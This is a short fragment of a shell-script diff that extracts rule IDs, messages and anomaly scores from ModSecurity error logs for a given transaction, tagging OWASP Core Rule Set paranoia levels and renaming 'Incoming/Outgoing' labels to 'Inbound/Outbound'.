-e "s/Incoming and Outgoing Score: [0-9]* [0-9]*/Incoming and Outgoing Score: .../" | sed -e "s/$PL1/& PL1/" -e "s/$PL2/& PL2/" -e "s/$PL3/& PL3/ " -e "s/$PL4/& PL4/" | sort -k2 | sed -r "s/^([0-9]+)$/\1 FOREIGN RULE NOT IN CRS/" + grep $uniq_id $errorlog | sed -e "s/.*\[id \"//" -e "s/\(......\).*\[msg \"/\1 /" -e "s/\"\].*//" -e "s/(Total .*/(Total ...) .../" -e "s/Inbound and Outbound Score: [0-9]* [0-9]*/Inbound and Outbound Score: .../" | sed -e "s/$PL1/& PL1/" -e "s/$PL2/& PL2/" -e "s/$PL3/& PL3/ " -e "s/$PL4/& PL4/" | sort -k2 | sed -r "s/^([0-9]+)$/\1 FOREIGN RULE NOT IN CRS/" echo - echo -n "Total Incoming Score: " + echo -n "Total Inbound Score: " # Here are two ways to get the transaction anomaly score, # the first one is Christian's format, second is Spartan's format